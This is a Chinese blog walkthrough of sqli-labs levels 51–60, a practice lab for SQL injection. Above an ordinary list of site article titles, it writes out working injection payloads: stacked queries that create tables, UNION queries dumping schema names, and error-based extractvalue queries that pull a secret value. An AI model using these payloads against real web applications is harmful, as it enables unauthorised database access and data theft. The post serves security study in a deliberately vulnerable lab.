第五十一关

这一关和三十八关基本一样 ,堆叠注入问题  只不过是字符型                  ?sort=1';create table test51 like users;%23

看数据库发现有啦

第五十二关

和五十关一样,只不过不显示错误
?sort=1;create table test52 like users;%23

堆叠注入

第五十三关

和五十一关一样,区别是不显示错误

?sort=1';create table test53 like users;%23

第五十四关

这一关没什么特别  特别在于查询的次数 ,只能输入10次注入信息,记录方式是cookie。

查库  ?id=-1%27%20union%20select%201,database(),%273

查表     ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

爆列      ?id=-1' union select 1,group_concat(column_name),3 from
information_schema.columns where
table_name='i58u96bgqr(后面这关name是咱们刚才查到的)

第五十五关

和上一关一样,加了一个小括号 通过测试发现是加了小括号,一共可以输入14次

查表        ?id=-1) union select 1,group_concat(table_name),3 from
information_schema.tables where
table_schema=database()%23(和上一关一样就是把引号改成括号)

第五十六关

和之前一样,通过测试发现是单引号括号闭合,其他的操作一样

看数据库名      ?id=-1') union select 1,database(),3%23

第五十七关

经过测试,发现是双引号闭合,其他和前几关一样

查询数据库名                ?id=-1" union select 1,database(),3%23

第五十八关

这关好像只有5次机会

后来发现没有回显,一查,这一关不能用union select语句了,那我们报错试一下

报错输入获得数据库名                   ?id=0' and extractvalue(1, concat(0x5c, (select database())))%23

那就说明报错说明可以的,报错注入在之前的文章有介绍,不在这里在做解释

 第五十九关

和上一关一样只不过没有单引号

报错输入获得数据库名                   ?id=0 and extractvalue(1, concat(0x5c, (select database())))%23

第六十关

和上一关一样,只不过多了双引号和括号?id=0”)

报错输入获得数据库名                  ?id=0") and extractvalue(1, concat(0x5c, (select database())))%23

获取表名      ?id=0") union select extractvalue(1,concat(0x7e,(select
group_concat(table_name) from information_schema.tables where
table_schema='challenges'),0x7e))--+

爆列名      ?id=-1") union select extractvalue(1,concat(0x7e,(select
group_concat(column_name) from information_schema.columns where
table_name='wapsbffje5'),0x7e))--+

爆数据      ?id=-1") union select extractvalue(1,concat(0x7e,(select group_concat(secret_XSR5) from wapsbffje5),0x7e))--+

输入进去        RsPZ518K3ZvXCVOvrGbhuqAZ  你搞定了他

最新文章

  1. php服务生成exe附件下载
  2. 使用mvn生成webapp失败,尚未找到原因
  3. [转]net中哈希表的使用 Hashtable
  4. 【转】HTTP 头部解释,HTTP 头部详细分析,最全HTTP头部信息
  5. Swift - iCloud存储介绍
  6. 17.从键盘上输入一个正整数n,请按照以下五行杨辉三角形的显示方式, 输出杨辉三角形的前n行。请采用循环控制语句来实现。 (三角形腰上的数为1,其他位置的数为其上一行相邻两个数之和。) 1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 1 5 10 10 5 1
  7. Codeforces Round #369 (Div. 2) D. Directed Roads (DFS)
  8. Java 内存模型- Java Memory Model
  9. Java基于TCP的Socket编程练习
  10. 入职第二天:使用koa搭建node server是种怎样的体验
  11. semantic ui框架学习笔记二
  12. 次小生成树(POJ1679/CDOJ1959)
  13. ASP.NET MVC案例教程(一) 准备
  14. TCP客户端图片上传服务端保存本地示例
  15. SharePoint Excel Service-PowerShell
  16. 吴裕雄 数据挖掘与分析案例实战(4)——python数据处理工具:Pandas
  17. linux tar 解压出错
  18. Python的模块调用
  19. python3 中文乱码,UnicodeEncodeError: 'latin-1' codec can't encode characters in position 10-13: ordinal not in range(256)
  20. php时间函数大锦集

热门文章

  1. React Native拆包及热更新方案 · Solartisan
  2. 二手iPhone,为什么没有火?
  3. Android系统使用Shell脚本预装apk
  4. JavaScript中prompt的使用
  5. python爬虫之浅析验证码
  6. IdentityServer4迁移至3.x版本注意问题详解
  7. Solr查询配置及优化【eDisMax查询解析器】
  8. python 写入 execl 文件 之 xlwt 模块
  9. py2.7 批量转换文件为 utf8 编码
  10. 19.10.11学习日记随笔 mysql事务隔离性